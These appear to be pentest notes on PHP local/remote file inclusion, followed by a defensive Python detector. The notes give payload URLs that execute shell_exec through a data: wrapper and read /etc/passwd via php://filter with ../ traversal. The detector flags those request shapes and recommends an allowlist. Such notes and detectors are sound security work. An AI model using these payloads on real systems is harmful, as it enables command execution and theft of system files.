LFI/RFI Vulnerabilities

Identifying Vulnerability

http://192.168.112.132/menu.php?file=data:text/plain,helloworld

If this payload returns helloworld, then we can use PHP wrappers to execute PHP commands too.

Executing commands

http://192.168.112.132/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

PHP filter

Another PHP wrapper is php://filter. In this example the output is encoded using base64, so you’ll need to decode the output.

http://192.168.155.131/fileincl/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
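A defender-side check for the three request shapes above, as an added example that is not part of the original notes: it flags query parameters whose decoded value starts with a stream wrapper scheme, contains ../ traversal, or carries a PHP open tag. The function names, the wrapper list, and the benign and double-encoded sample URLs are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed list of PHP stream wrapper schemes worth flagging in an include parameter.
WRAPPER_RE = re.compile(r"^\s*(data|php|expect|zip|phar|file|ftp|https?):", re.I)
# ".." as a whole path segment, including right after "resource=".
TRAVERSAL_RE = re.compile(r"(^|[\\/=])\.\.([\\/]|$)")

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_param(value):
    """Return the reasons a parameter value looks like a file-inclusion probe."""
    v = fully_decode(value)
    reasons = []
    m = WRAPPER_RE.match(v)
    if m:
        reasons.append("wrapper:" + m.group(1).lower())
    if TRAVERSAL_RE.search(v):
        reasons.append("traversal")
    if "<?php" in v.lower() or "<?=" in v:
        reasons.append("php-tag")
    return reasons

def scan_request(url):
    """Map each flagged query parameter name to its list of reasons."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        reasons = classify_param(value)
        if reasons:
            findings[name] = reasons
    return findings

if __name__ == "__main__":
    # First and third URLs are from the notes; the other two are constructed.
    samples = [
        "http://192.168.112.132/menu.php?file=data:text/plain,helloworld",
        "http://192.168.112.132/menu.php?file=data%253Atext/plain,x",
        "http://192.168.155.131/fileincl/example1.php?page=php://filter/"
        "convert.base64-encode/resource=../../../../../etc/passwd",
        "http://192.168.112.132/menu.php?file=about.php",
    ]
    for url in samples:
        print(scan_request(url) or "clean", url)
```

Pattern matching like this belongs in log review or a WAF rule; the fix in the application is to map the parameter to a fixed allowlist of files instead of passing it to include.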
